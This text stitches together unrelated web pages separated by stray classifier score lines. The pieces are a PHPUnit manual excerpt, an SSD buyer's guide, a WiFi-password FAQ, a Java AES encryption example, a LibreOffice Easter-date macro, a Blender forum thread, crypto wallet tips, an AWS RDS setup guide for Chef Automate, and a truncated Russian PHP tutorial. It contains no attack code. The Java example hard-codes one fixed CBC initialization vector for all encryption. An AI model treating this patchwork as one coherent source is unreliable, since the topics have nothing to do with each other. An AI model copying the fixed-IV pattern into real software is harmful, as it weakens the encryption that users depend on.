начнем с простого условия – оператор if. Оператор условия if Для лучшего понимания я изобразил схему конструкции if в виде рисунка: Оператор условия if Теперь попробуем трансформировать жизненный пример, который я навел выше, в код php. <?php $weather = "дождь"; //значение if ($weather=="дождь") // условие { echo "Я сижу дома"; // результат } ?> Если вы сохраните php файл с этим кодом и откроете его через локальный сервер (см. урок №3), то в результате получится: Я сижу дома ⇒ Разъяснение кода: В условии я сравнил переменную $weather со значением "дождь" (строка №3). Человеческим языком этот код звучит так: если переменная $weather равна значению "дождь", тогда выводить нужно текст "Я сижу дома". Кстати, напомню вам (если подзабыли урок №8), что знак равенства обозначается двойным знаком «равно», вот так (==). Если к переменной $weather написать другое значение (строка №2), например, снег, тогда в браузере будет пустая страничка, так как условия не были соблюдены. → КОД-ШАБЛОН "КОНСТРУКЦИЯ if": <?php if (условие) { Этот код выполнится, если условие верно } ?>   → Шпаргалка: Равенство: == Пример: if ($a == $b) Не равенство: != Пример: if ($a != $b) Больше: > Пример: if ($a > $b) Меньше: < Пример: if ($a < $b) Больше или равно: >= Пример: if ($a >= $b) Меньше или равно: <= Пример: if ($a <= $b) Логическое «и»: and Пример: if ($a ==$b and $c !=$d) Логическое «или»: or, || Пример: if ($a ==$b || $c !=$d)   Оператор условия if-else Теперь попробуем вывести сообщение, если условия не были соблюдены, а именно, если идет дождь, сижу дома, если нет дождя, беру мяч и иду играть футбол. Для лучшего понимания посмотрим рисунок снизу: Оператор условия if-else Теперь схему переведем в реальный код: <?php $weather = "солнце"; //значение if ($weather=="дождь") //условие { echo "Я сижу дома"; //результат если условие верно } else { echo "Я беру мяч и иду играть в футбол"; //результат если условие не верно } ?> Результат: Я беру мяч и иду играть в футбол ⇒ Разъяснение кода: В условии я сравнил переменную $weather со значением "дождь" (строка №3), но так как переменной $weather я присвоил значение "солнце" (строка №2), то условие не было соблюдено (значения не одинаковы), а это значит, что будет работать вторая часть кода (else): else { echo "Я беру мяч и иду играть в футбол"; //результат если условие не верно } → КОД-ШАБЛОН "КОНСТРУКЦИЯ if-else": <?php if (условие) { Этот код выполнится, если условие верно } else { Этот код выполнится, если условие не верно } ?> Двойное условие if-else Переходим к более сложному – двойное условие if-else. Давайте на примере создадим проверку пароля и логина. Цель: Создать условие проверки логина и пароля. Если пароль или логин не совпадают, вывести сообщение об ошибке. Приступим. Создадим для начала две переменные $logo и $password с соответствующими значениями: <?php $logo = "StepkinBLOG"; //значение $password = 1234567890; //значение ?> Теперь создадим двойное условие для проверки переменных $logo и $password: <?php $logo = "StepkinBLOG"; //значение $password = 1234567890; //значение if ($logo =="StepkinBLOG" and $password == 123) //условие { echo "добро пожаловать в админ-панель"; //результат если условие верно } else { echo "Логин или пароль не верный"; //результат если условие не верно } ?> Обратите внимание, в условии мы разделили две переменные оператором "AND". Это означает, что две переменные должны быть правильными для выполнения условия, но так как у нас в условии не совпадает пароль (стока№4), значит, условие неверное и на экране вы увидите вот такое сообщение: Логин или пароль не верный Если поменяете значение переменной $password на "123" (строка №3), тогда условия будут полностью соблюдены (строка №4): <?php $logo = "StepkinBLOG"; // значение $password = 123; //значение if ($logo =="StepkinBLOG" and $password == 123) //условие { echo "добро пожаловать в админ-панель"; //результат если условие верно } else { echo "Логин или пароль не верный"; //результат если условие не верно } ?> Результат: добро пожаловать в админ-панель Вложенные конструкции if-else Вложенная конструкция – это когда внутри конструкции находится еще одна конструкция. Не совсем понятно объяснил? Не беда, на примере все поймете. Цель: Создать условие проверки логина и пароля. Если пароль или логин не совпадают, вывести сообщение об ошибке, если совпадают, тогда еще проверить секретное слово, если секретное слово не совпадает, вывести сообщение об ошибке, если совпадает, тогда вывести сообщение "добро пожаловать в админ-панель". Приступим: Создадим для начала три переменные, $logo, $password и $x с соответствующими значениями: <?php $logo = "StepkinBLOG"; //значение $password = 123; //значение $x = "BlogGOOD"; //значение ?> Теперь создадим двойное условие для проверки переменных $logo и $password: <?php $logo = "StepkinBLOG"; //значение $password = 123; //значение $x = "BlogGOOD"; //значение if ($logo =="StepkinBLOG" and $password == 123) //условие №1 { // тут будет еще одно условие с секретным словом } else { echo "Логин или пароль не верный"; //результат если условие не верно } ?> Теперь под комментарием " // тут будет еще одно условие с секретным словом" (строка №7) пропишите еще одну конструкцию if-else с условием проверки переменной $x: <?php $logo = "StepkinBLOG"; //значение $password = 123; //значение $x = "Stepa"; //значение if ($logo =="StepkinBLOG" and $password == 123) //условие №1 { // тут будет еще одно условие с секретным словом if ($x = "BlogGOOD") //условие №2 { echo "добро пожаловать в админ-панель"; //результат если условие верно №2 } else { echo "секретное слово не верное"; //результат если условие не верно №2 } } else { echo "Логин или пароль не верный"; //результат если условие не верно №1 } ?> Так как секретное слово неверное (строка №8), то на экране будет сообщение: секретное слово неверное Если вы замените значение переменной $x на "BlogGOOD", тогда и секретное слово будет правдивым: <?php $logo = "StepkinBLOG"; //значение $password = 123; //значение $x = "BlogGOOD"; //значение if ($logo =="StepkinBLOG" and $password == 123) //условие №1 { // тут будет еще одно условие с секретным словом if ($x = "BlogGOOD") //условие №2 { echo "добро пожаловать в админ-панель"; //результат если условие верно №2 } else { echo "секретное слово неверное"; //результат если условие не верно №2 } } else { echo "Логин или пароль не верный"; //результат если условие не верно №1 } ?> Так как логин и пароль верный и это значит, что условие было соблюдено, то заработала первая часть кода, где нужно было проверить секретное слово. Так как и секретное слово верное с условием, тогда на экране вы увидите сообщение: добро пожаловать в админ-панель → КОД-ШАБЛОН "ВЛОЖЕННАЯ КОНСТРУКЦИЯ if-else": <?php if (условие) { Этот код выполнится, если условие верно if (условие) { Этот код выполнится, если условие верно } else { Этот код выполнится, если условие не верно } } else { Этот код выполнится, если условие не верно } ?> Оператор условия elseif Конструкция elseif - это комбинация конструкций if и else, которая поможет проверить несколько условий подряд. Синтаксис: <? if (условие) { действие } elseif (условие) { действие } elseif (условие) { действие } else { Действие, если ни один случай не подошел } ?> Заметьте, в строках №6 и №10 специально два слова написаны вместе «elseif», если вы их разделите пробелом «else if», то код выдаст ошибку. Давайте приведу рабочий код с выбором учебника по программированию. Пример: <? // Используем elseif $stepkinblog = "PHP"; if ($stepkinblog == "C++") { echo "Вы заказали учебник по C++"; } elseif ($stepkinblog == "JavaScript") { echo "Вы заказали учебник по JavaScript"; } elseif ($stepkinblog == "PHP") { echo "Вы заказали учебник по PHP"; } elseif ($stepkinblog == "JAVA") { echo "Вы заказали учебник по JAVA"; } else { echo "Сделайте выбор"; //Действие, если ни один случай не подошел } ?> Результат: Вы заказали учебник по PHP Способ elseif можно записать так же и вложенной конструкцией if else: <?php // Используем if-else $stepkinblog = "PHP"; if ($stepkinblog == "C++") { echo "Вы заказали учебник по C++"; } else { if ($stepkinblog == "JavaScript") { echo "Вы заказали учебник по JavaScript"; } else { if ($stepkinblog == "PHP") { echo "Вы заказали учебник по PHP"; } else { if ($stepkinblog == "JAVA") { echo "Вы заказали учебник по JAVA"; } else { echo "Зделайте выбор"; //Действие, если ни один случай не подошел } } } } ?> Результат такой же, вот только запутаться легче (я  2 раза запутался в своем же коде ) :mrgreen:. Дополнение к уроку (пока знать не обязательно): Есть еще несколько вариантов, как можно записывать конструкцию if else (альтернативный синтаксис). Про альтернативный синтаксис я подготовлю целый урок, где все растолкую и покажу. Сейчас просто пробежитесь глазами. Код №1: <?php $a = 15; if ($a == 15): ?> <h3> Переменная "$а" содержит значение 15 </h3> <?php endif; ?> Код №2: <?php $a = 6; if ($a == 5): echo " Переменная содержит значение 5"; elseif ($a == 6): echo " Переменная содержит значение 6"; else: echo " Переменная не содержит значение 5 и не 6"; endif; ?> Домашнее задание: Попробуйте в условии вместо равенства (==) поставить неравенство (!=) или попробовать со знаками больше меньше: <? $num = 1; if ($num <= 10) { echo "переменная меньше или равна 10"; } else { echo "переменная больше 10"; } ?> а также замените оператор "AND" на "OR". Все, жду вас на следующих уроках! Подписывайтесь на обновления блога! Случайные записи: 1. Установка локального сервера на компьютер. Основы PHP с нуля. Урок №3 2. PHP операторы. Основы PHP с нуля. Урок №8 3. Создание дополнительных классов. Основы bootstrap 3 для начинающих. Урок №23 4. Атрибут download в HTML5 (для скачивания файлов) 5. Коды цветов в HTML. Основы HTML для начинающих. Урок №11 Последние записи рубрики: 1. Работа с файлами-3 (дополнительные функции и возможности). Основы PHP с нуля. Урок №21 2. Работа с файлами-2 (удаление, копирование, переименование и перемещение файлов). Основы PHP с нуля. Урок №20 3. Работа с файлами-1 (создание, открытие, отображение, запись и закрытие файлов). Основы PHP с нуля. Урок №19 4. Полезные функции php List, Isset, Unset, Empty, Date, Count и Exit. Основы PHP с нуля. Урок №18 5. Подключение файлов php через Include или Require. Основы PHP с нуля. Урок №17 Добавить комментарий ;-) :| :x :twisted: :smokes: :smile: :shock: :sad: :rose: :roll: :razz: :pop-corne: :oops: :o :mrgreen: :lol: :idea: :grin: :gazeta: :evil: :cry: :cool: :coffe: :arrow: :???: :?: :!: Подписаться на обновления: Подпишись на обновления моего блога через e-m@il: @ Реклама на блоге: Мои цели на 2019 год: Довести количество статей до 150 Доделать этот блог Закончить тему «Основы CSS» Закончить тему «Основы PHP» Начать тему «Основы JavaScript» Добиться посещаемости 500 чел/сутки Статистика: Записей: 108 Страниц: 3 Рубрик: 9 Меток: 11 Комментариев: 286
__label__pos
0.879794
CoreBOSBB Full Version: Session duration for webservice You're currently viewing a stripped down version of our content. View the full version with proper formatting. Pages: 1 2 3 I'm working on the mechanics portal, and was wondering if and how we can set the max session time for a webservice session. Some reports can take up to 40 minutes to fill out, so the session could expire during the filling of the form. Seems cool, but I've no experience with applying diffs, could you give a few pointers? Also, I'd need to update my client library to use this new functionality right? (12-19-2016, 07:57 PM)Guido1982 Wrote: [ -> ]Seems cool, but I've no experience with applying diffs, could you give a few pointers? copy the file to the top of your install and execute this command Code: patch -p 1 < WebserviceDefineExpireTime.diff the patch command knows how to read the format and apply the changes for you. In general, the lines that start with minus have to be deleted and the ones with plus added, usually it is the same line with some change. In this case you also get a completely new file with some SQL that you need to execute. (12-19-2016, 07:57 PM)Guido1982 Wrote: [ -> ]Also, I'd need to update my client library to use this new functionality right? Yes, you will have to adapt the getChallenge call Quote:patch -p 1 < WebserviceDefineExpireTime.diff Would this also work for a non-git controlled version? In the 'get_challenge', we could set an expirytime. Would be a UNIX timestamp I assume? Yes, this works on any coreBOS install. The $exptime parameter is minutes and it gets converted into a unix timestamp, so, yes, you can set any unix timestamp in the database table. If I were to execute PHP Code: INSERT INTO `vtiger_ws_operation_parameters`(`operationid`, `name`, `type`, `sequence`) VALUES ((SELECT `operationidFROM `vtiger_ws_operationWHERE `name`='getchallenge'),'exptime','string',2 in phpmyadmin and alter the file '/include/Webservices/AuthToken.php' (the vtws_getchallenge function), this would basically be the same as executing the diff right? Wait, I see. The query adds a parameter to the getchallenge function. How cool, never knew you could use a query within a query. I have a VPS that runs ubuntu server to play with and learn bash like commands, but no time to actually get to it.. It worked. I installed log4php on my portal and setup a log message: Code: 22-12-2016 15:04:11 method: __doChallenge message: Login by Someone, expires at 16:04:11 Obviously I set the expiration to an hour. I was just debugging another issue and went to create a global variable. I saw these two:  'WebService_Session_Life_Span', 'WebService_Session_Idle_Time' which got me thinking about this thread. I had a quick look and it turns out that these are the real way to extend the webservice session life span. The patch I shared on the gist extends ONLY the time you have to log in. In other words the time that the authtoken getChallenge returns is valid. Once you have logged in you are given a sessionid which is what you use for the rest of the calls. The life of this sessionid is controlled by the two global variables above and are what will permit you to keep connected to the service. The documentation on the global variable module says: WebService_Session_Idle_Time: Maximum life span that a session should be kept alive after the last transaction. Default is 1800 (seconds). That means that after each access to the service the life of the session is set to 1800 seconds, so you can keep the session open just by accessing under this time. WebService_Session_Life_Span:  Maximum life span of a webservice session. After this time the session will be destroyed even if it is being kept alive. Default is a day. This is the one you want to change in your install. That's what I suspected: I did some tests and it turned out that I was able to do updates when my session should have been expired and vice versa: not being able to update when I should have been allowed to. I checked the docs and was amazed that the challenge set the session expiration in stead of the login, but it seems that wonder was just. Good to have you around again, thanks for the GV's. I think I need the other one though "Session Idle Time". The form the mechanics need to fill can take more than 30 minutes (1800 seconds) to fill, and after that the update fails and login is displayed. They will never be logged in more than a day, and there will be no issues when they accidentally try to do so. Pages: 1 2 3
__label__pos
0.56525
Jump to content Excelsior Forums xcr Members • Content count 0 • Joined • Last visited Posts posted by xcr 1. Hello, The applications is one exe and other jars compiled into DLLs. My question is if the size and amount of dependencies affect the startup time of the application? Yes, splitting an application into multiple components may reduce startup time due to loading the libraries. Also it may significantly reduce the effect of using the Startup Optimization Toolkit included with Excelsior JET. For more details, please see "Startup time optimization" chapter of the documentation. Best Regards, Svyatoslav 2. I have 4 PC's running game clients and at least once a day one of them quits to desktop, and others just keep on running. Does the crash occurs on the same PC every time? If so, is there any differences in OS configurations of PCs? Which version of JET do you use? Does anything appear in dmesg output or syslog when the crash occurs? 3. Hi, Could you please show your LD_LIBRARY_PATH value? (run echo $LD_LIBRARY_PATH in console) Also, please enable full stack trace support at page "Target" of JET Control Panel, re-compile, re-pack and re-install your application. Then please run it again and post a stack trace here. 4. "resistance to SA_RESTART flag" is fact that application will not misbehave (will write correct number of bytes) when it receives SA_RESTART flag in signal. SA_RESTART flag itself does not make the application to misbehave, it actually helps to cut off possible problems caused by wrong handling of EINTR. The application misbehaves due to wrong handling of interruption. With disabled SA_RESTART flag the write issue can not disappear. But some new issues may pop up. I would like to know how can i send in automated way multiple number of signals to my application that will check correct handling of write interruption. Please try to stress test thread executing this native code with Thread.suspend()/resume(). 5. It is actually not a defect. The location of Special Windows Folders (like the Application Data, My Documents etc.) depends on installation type: Common or Personal. Special folder "Application Data", it is resolved by "CSIDL_APPDATA" or "CSIDL_COMMON_APPDATA" depending on installation type. CSIDL_APPDATA - The file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\username\Application Data. CSIDL_COMMON_APPDATA - The file system directory that contains application data for all users. A typical path is C:\Documents and Settings\All Users\Application Data. This folder is used for application data that is not user specific. You can select which type of installation better suits your needs from the "Installation type" combo box which is located on the page "Settings", tab "Install". The following options are available: Auto-detect - if the logged user has required administrative rights, the application will be installed as "Common" and will be available for all the users of that machine. Otherwise the application will be installed as "Personal" and will be available only for the user that installed it. User decide - if the user has administrative rights he will be prompted to select installation type. Otherwise, the application will be installed as "Personal". Common - the application will be available for all the users of that machine. If the logged user is not a member of the "Administrators" user group, he will be notified that administrative privileges are required to install the application. Personal - the application will be available only for the user that installed it. It is supposed that the installation does not require administrative privileges. So if you want your application to be installed to user's application data, please choose "Personal". 6. What other calls apart from write can be interrupted? Can you refer me to some documentation? Please start with section "Interruption of system calls and library functions by signal handlers" at http://man7.org/linux/man-pages/man7/signal.7.html Note that we use SA_RESTART flag. How do you recommend us to fix/workaround 3rd party JNI libs for which we will never have the source code? The assumption that a system call from a native library will never be interrupted is wrong. It is not enforced by the Java specification, so using a system call without checking if it was interrupted is a bug. Even having the source code of Excelsior JET you can't do anything to reliably work around this bug in the library if you don't have its source code. So the only recommendation is to contact the authors of the library and ask them to fix it, because it is much easier to fix a library than to re-implement threading in VM. 7. Implementation of threading in Excelsior JET VM differs from that of Oracle JVM. Although we use signal handling in our implementation for Linux, it still complies with the Java specification, which is also confirmed by the fact that Excelsior JET passes JCK. On the other hand, the behavior of write call when it writes only a part of data is expected and described in its documentation. Sometimes it happens that an application or native library works on Oracle JVM but does not work on Excelsior JET (and some other VMs too) due to relying on implementation features not enforced by the Java specification. You may find other examples of such problems in the pinned topics of "Defect Reports" on the forum. 8. You are welcome! Also, this method requires to create a batch script, so it may be inconvenient. Here are the alternatives: 1) You can build your application with fake empty audio.zip file, opting not to pack it in executable in JET Control Panel, then add it to the installation package on "Resources" page of JetPack II. So it will be included to the classpath. After installation the fake empty archive can be replaced by the real one. 2) You can create multi-app executable by choosing the corresponding option on the "Target" page of JET Control Panel. This executable may take "java.class.path" property from its arguments. So then in JetPack II you can choose corresponding application shortcut on tab "Shortcuts" on page "Misc" and specify application classpath by adding "-Djava.class.path=<classpath>" to its arguments. 9. Then you can do this by explicitly specifying classpath for deployed application before launching it by using environment variable JETVMPROP. You should add "-Djava.class.path=<classpath>" to it, where <classpath> should be replaced by classpath which your deployed application uses including path to audio.zip. For example: set JETVMPROP="-Djava.class.path=.\resources\audio.zip" App.exe Please try to do this and let us know if it helps. 10. You can also try the following solution: public audio(String audioFile) { try { AudioInputStream audioInputStream = AudioSystem.getAudioInputStream(new File(audioFile)); DataLine.Info info = new DataLine.Info( Clip.class, audioInputStream.getFormat() ); final Clip clip = (Clip) AudioSystem.getLine(info); clip.addLineListener(new LineListener() { public void update(LineEvent e) { if (e.getType() == LineEvent.Type.STOP) { synchronized(clip) { clip.notify(); } } } }); clip.open(audioInputStream); clip.start(); synchronized (clip) { clip.wait(); } clip.drain(); clip.close(); } catch (Exception ex) { ex.printStackTrace(); } } (based on http://www.ibm.com/developerworks/java/library/j-5things12/index.html#N101F8) It works well on my system. 11. Hello, First of all, you should go to Excelsior JET directory (/excelsior/jet7.6-eval) and run . setenv This will add JET directories to your PATH environment variables. Then you can compile Tomcat with applications from command line using the following command: jc =tomcat /prd/rsp/tomcat6.0/ Alternatively, you can create project file (.prj) using JET Control Panel on Windows, and then use on Linux jc =p your_project_file.prj You should run this command from the same directory, where the project file is located, and its relative path to Tomcat directory should be the same as on the system where you have created the project file. 12. Do you use 64-bit CentOS? This may cause the problem, since JET is 32-bit. If your CentOS is 32-bit, the following is irrelative. Do you have 32-bit version of libnss_ldap.so.2 library in your system? It should be found at /lib or /lib32 To ensure it is 32-bit, you may check it with "file -L": $ file -L /lib/libnss_ldap.so.2 /lib/libnss_ldap.so.2: ELF 32-bit ... Also, to check if a 32-bit program on your system may correctly get passwd info from LDAP directory, please compile the test program from my previos post in 32-bit mode and run it. If you do not have a 32-bit Linux machine to easily compile the program, you may use the following command: gcc -m32 test.c (Probably it requires to install additional packages with 32-bit development files). 13. passwd: files ldap It looks correctly. Please run the following command in your terminal: getent passwd $(id -u) Does it output user info correctly, or silently exits? Also, if you can compile a C program, could you please build and run the following test: #include <stdio.h> #include <pwd.h> #include <unistd.h> #include <errno.h> int main() { struct passwd * pw = getpwuid(getuid()); if(pw == NULL) { printf("No user info found; errno=%d\n", errno); } else { printf("name\t%s\nuid\t%d\nhome\t%s\n", pw->pw_name, pw->pw_uid, pw->pw_dir); } return 0; } Does it output your user info? If it does not, what message does it show? ×
__label__pos
0.925177
Animated Particles From Valve Developer Community Revision as of 01:29, 4 July 2008 by TomEdwards (talk | contribs) Jump to: navigation, search Particles are animated by using a material comprised of a collection of materials all built together into a "sheet". This is accomplished by using the mksheet.exe tool. Creating an MKS File First, place your materials that will make up the sheet in a separate sub-directory, usually named for the material they will ultimately represent. For instance, the smoke1.vmt is placed under the materials/particles/smoke1 subdirectory. Next, create a file with the same name as the material you'd like to make, and give it an .mks file extension. For the smoke1.vmt, you would call this smoke1.mks. The .mks file defines how the sheet is interpreted when the particle is rendered. You can organize materials in to sequences for playback, define the number of frames and their playback rate, and whether a sequence should loop continuously. In the .mks file, this looks like: // First sequence sequence 0 loop frame mymaterial1.tga 1 frame mymaterial2.tga 1 // Second sequence sequence 1 frame mymaterial3.tga 1 // multiple image sequence (two images per frame, for multi-texturing) sequence 2 frame fire_base0.tga fire_additive0.tga 1 frame fire_base1.tga fire_additive1.tga 1 // Sequence that combines the alpha channels of two frames at a time // into the alpha and green channels of a frame for a special shader sequence 3 frame frame0.tga{g=a},frame1.tga{a=a} 1 frame frame2.tga{g=a},frame3.tga{a=a} 1 sequence Tells mksheet that the following frames are to be grouped together into a sequence, which can be referred to by number. This allows you to pick different animations or frame groups when the particle is created. frame Takes two parameters. The first is the material to use for this frame. The second is the playback rate. A value of 1 tells the renderer to playback this frame for the normal time duration. A value of 0.5 would play the frame for half as long as was specified in the particle definition, and a value of 2 would make the frame render for twice as long. loop Tells the renderer to loop the frames continuously. Without this identifier the renderer would play all the frames in the sequence once and stop on the last frame. Additionally, frames can be packed separately in RGB from Alpha. This takes the alphas from a set of input frames and stores them in the alpha of the output sheet. It takes the RGBs and stores them in the RGB. The interesting thing about this is that each get their own sequences. They also have their frame sizes entirely decoupled, so the RGB's can have 200x200 images while the alpha has 150x150, for example. See Below : // Sequence that stores separate frame data in the RGB from the alpha // for dual sequencing combining one set of RGBs and another set of alphas // Packmode sets mksheet to separate the RGB frames from the Alpha ones. packmode rgb+a // First Sequence - Looping Alpha Frames sequence-a 0 LOOP frame reframedSmokeSprites170_0033.tga 1 frame reframedSmokeSprites170_0035.tga 1 // Second Sequence - Looping RGB Frames sequence-rgb 1 LOOP frame smokeTex0001_341.tga 1 frame smokeTex0002_341.tga 1 The output from this .mks file can be seen below. The RGB and alpha channels are shown. Note that the individual frame sizes are all non-power-of-two and that they different between the RGB and Alpha frames. Example output - RGB Example output - Alpha Compiling the Sheet Once the materials are in the proper directory, along with the .mks file, you can compile the images in to one sheet. To do this, we use the mksheet.exe tool. mksheet sheet.mks [sheet.sht sheet.tga] The tool takes one main parameter and two optional ones. The first is the .mks sheet which will define how the .sht and .tga files are created. The second, optional parameter is the .sht file to create (used by the engine). Finally, the third optional parameter is the .tga file to create which is the packed version of all the materials specified in the .mks file. The second and third parameters should almost always bear the name of the ultimate material you wish to create. For example, the build call for the smoke1.vmt material would be: UPDATE : .sht files are no longer used by the engine - they are now incorporated directly into the .vtf. mksheet smoke1.mks [smoke1.sht smoke1.tga] Compiling the Texture At this point you should have a .sht and .tga file. You can now compile the output .tga file using the vtex.exe tool like any other material. The vtex.exe tool will automatically place the .sht file in the correct place. Once the material is compiled, it is ready for use in the engine. UPDATE : .sht files are no longer used by the engine and not required. Warning.png Warning: VTFEdit probably doesn't support this type of compiling yet. Notes You can use the same image file in multiple sequences (or multiple times within the same sequence) without it being duplicated in the output sheet. Examples where you would want to do this are sequences with different timing, particle sequences, looped and non-looped versions of a sequence, etc. To the extent practical, you should combine as many sprite textures into one sheet as possible, and use different sequences for the different particle systems (hmm this implies that we might want named sequences for sanity's sake). This will allow particle systems to be drawn with fewer state changes or even as one batch.
__label__pos
0.685498
max max2mo ago Deno.serve: Is it possible to flush a streaming response? I've been playing around with this: https://docs.deno.com/examples/http-server-streaming I am coming from Go and I'm used to having the functionality to flush the http response to the socket. Allowing lots of control over when bytes are sent over the wire (like so: https://robpike.io/) Is there any mechanism to prompt deno to write to the socket? Maybe another streaming response type? Thanks! 2 Replies Deno AI Helper Deno AI Helper2mo ago I wasn't able to find the answer to your question in the official Deno documentation. However, based on the information you've provided, I can offer some general advice. In Deno, when you're working with streaming responses, you typically use the ReadableStream API to send data in chunks. The data is sent to the client as it's being read from the stream. However, there isn't a direct equivalent to Go's Flush method in Deno's standard library that I can reference from the official documentation. If you're using the example from the Deno documentation for streaming responses, make sure you're following the pattern of using a ReadableStream to send data in chunks. Here's a simplified example of how you might send chunks of data: const body = new ReadableStream({ start(controller) { controller.enqueue("First chunk of data,"); controller.enqueue("second chunk of data,"); // ... controller.close(); }, }); await Deno.serve((req) => new Response(body), { port: 8000 }); const body = new ReadableStream({ start(controller) { controller.enqueue("First chunk of data,"); controller.enqueue("second chunk of data,"); // ... controller.close(); }, }); await Deno.serve((req) => new Response(body), { port: 8000 }); In this example, each call to controller.enqueue() sends a chunk of data to the client. However, this is not based on the Deno documentation, and I advise you to double-check the accuracy of this advice. If you need more control over the timing of when bytes are sent over the wire, you might need to look into lower-level APIs or third-party libraries that could offer more granular control over the response stream. Remember to check the Deno third-party modules (https://deno.land/x) for any libraries that might provide the functionality you're looking for. dantheman dantheman2mo ago I find that Deno will flush the response continuously, as you give data to the response stream. And for emitting a streaming response I sometimes find it easier to yield chunks from an async generator function, here's a basic example: https://dash.deno.com/playground/sour-bobcat-21 I don't know what makes a browser show partial pages like the robpike example Ah! It looks like Deno Deploy's default compression buffers output into chunks. I got the expected continuous output in Chrome after adding this response header: Cache-Control: no-transform Hope this helps 🙂
__label__pos
0.767207
  × Find plugins Artifact diff1.3Minimum Jenkins requirement: 1.532ID: artifact-diff-plugin Installs: 417 Last released: 3 years ago Maintainers Oliver Gondža Dependencies No dependencies found View Artifact diff Plugin on the plugin site for more information. Artifact diff plugin Plugin can compare content of an artifact identified by its relative path among different builds. URL format Plugin introduces transient build action using artifact-diff url name. Action itself consumes build number to compare against followed by an artifact path. <buildUrl>/artifact-diff/<otherBuildNumber>/<artifactPath> The output argument is used to switch between the html (the default) and plain text output. • output = html|plain Output format • Plugin uses the Unified diff format to represent artifact difference. • /dev/null placeholder filename is used to represent an artifact that could not be read, such artifact is then treated as empty. • An empty diff sequence is used when both artifacts equal. Changelog 1.2 • Fix RunList related regression ArchivesGet past versions Labels This plugin has no labels
__label__pos
0.648665
BlogPapers SummerSec View on GitHub Spring Framework RCE CVE-2022-22965 漏洞分析 摘要 本文会从几个角度分析漏洞CVE-2022-22965,首先会从payload的构造。每次我都喜欢先分析漏洞的payload,不得不承认实力没达到可以直接分析漏洞地步。所以会先看看payload的构造过程看看,每次学习和分析漏洞的payload能学到很多有趣的角度和想法。从payload的构造分析,分析payload的构造能够站在挖掘者的角度思考一个sink点,应该如何去寻找一条data-flow-path,并且能够满足流向sink的path。其次会结合SPA知识,call-graph分析部分功能点,最后会分析一波漏洞的修复方案。 Payload 构造 下面是本次RCE的payload,看上去并不是很难的样子。其中蕴藏了几个小知识点,下面逐一分析。首先大体看payload是由请求头和请求体两部分组成。 headers = { "suffix":"%>//", "c1":"Runtime", "c2":"<%", } class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= 知识点–Tomcat Access Log 在Tomcat的conf目录下的server.xml文件中配置了访问日志文件, <!-- Access log processes all example. Documentation at: /docs/config/valve.html Note: The pattern used is equivalent to using pattern="common" --> <Valve className="org.apache.catalina.valves.AccessLogValve" directory="logs" prefix="localhost_access_log" suffix=".txt" pattern="%h %l %u %t &quot;%r&quot; %s %b" /> className="org.apache.catalina.valves.AccessLogValve"对应设置日志文件的日志规范类,控制日志文件的文件名、文件后缀和日志输出格式等信息。这里我们就大致理解payload中的suffixprefixpattern的作用了。 image-20220404194617108 %{}i在payload中有这个格式,查阅tomcat相关资料可以发现这里的%{}i是以 Apache HTTP 服务器日志配置语法为模型,支持写入传入或传出标头,Cookie,会话或请求属性以及特殊时间戳格式的信息。 image-20220404201252535 这里也就解释了请求包中有特殊的几个header,以及其作用。我们现在可以将payload进行转化一下,也就等同于下面了这段payload。 class.module.classLoader.resources.context.parent.pipeline.first.pattern=<% if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %>// class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= 知识点—JDK module模块 JDK9引入了一个新的特性叫做JPMS(Java Platform Module System),也可以叫做Project Jigsaw。模块化的本质就是将一个大型的项目拆分成为一个一个的模块,每个模块都是独立的单元,并且不同的模块之间可以互相引用和调用。 引入module之后,原本被修复的漏洞就使用module特性进行绕过了。 image-20220404202049235 知识点—AbstractNestablePropertyAccessor嵌套结构 为了理解payload为什么会有这么长class.module.classLoader.resources.context.parent.pipeline.first.suffix,这里得理解AbstractNestablePropertyAccessor的嵌套结构。为了帮助读者更好理解嵌套结构,笔者写了一段代码作为演示。 public class School { String name; Student student; // TODO 添加setter和getter方法 public static class Student { String name; Age age; // TODO 添加setter和getter方法 } public static class Age { int age; // TODO 添加setter和getter方法 } // 为了代码量变少点,这里删除setter和getter方法,如果使用自行添加。 } 对应输出代码,demo类源码参考struts-tester/struts-tester.jsp public static void main(String[] args) throws Exception { java.util.HashSet set = new java.util.HashSet<Object>(); School school = new School(); school.setName("beijing"); School.Student student = new School.Student(); student.setName("wangshuai"); School.Age age = new School.Age(); age.setAge(18); student.setAge(age); school.setStudent(student); Object target = demo.applyGetChain(school,""); boolean debug = false; demo demo = new demo(); demo.processClass(target, System.out, set, "", 0, debug); } 从这里可以很轻松的看懂为什么class.module.classLoader.resources.context.parent.pipeline.first.suffix构造,下面另一张图可以找到一些可利用的gadget。 image-20220408150203711 image-20220408153317840 漏洞成因分析 前面我们分析了目前该漏洞最广泛的漏洞payload,那么我们再看看漏洞是如何形成就可以非常明确知道出现问题的可能性了,在分析对应的实现源码。 其实现在已经非常明确知道,这是一个功能点,被恶意利用了。分析源码是为了看实现原理,分析再次如果的可能性以及再遇到再相似代码可以更好的分辨。 org.springframework.beans.AbstractNestablePropertyAccessorgetPropertyAccessorForPropertyPath打个断点,我们先看看他的Call Graph是怎么样。原图地址:call-graph 使用call graph能够比较直观分析数据的流进流出,不难发现getPropertyValue –> getFirstNestedPropertySeparatorIndex->getNestedPropertyAccessor->getPropertyAccessorForPropertyPath是这么一个过程。 image-20220410221901777 但debug看堆栈发现,并不是getPropertyValue去调用了getPropertyAccessorForPropertyPath而是setPropertyValue调用的。 getPropertyAccessorForPropertyPath(String):815, AbstractNestablePropertyAccessor (org.springframework.beans), 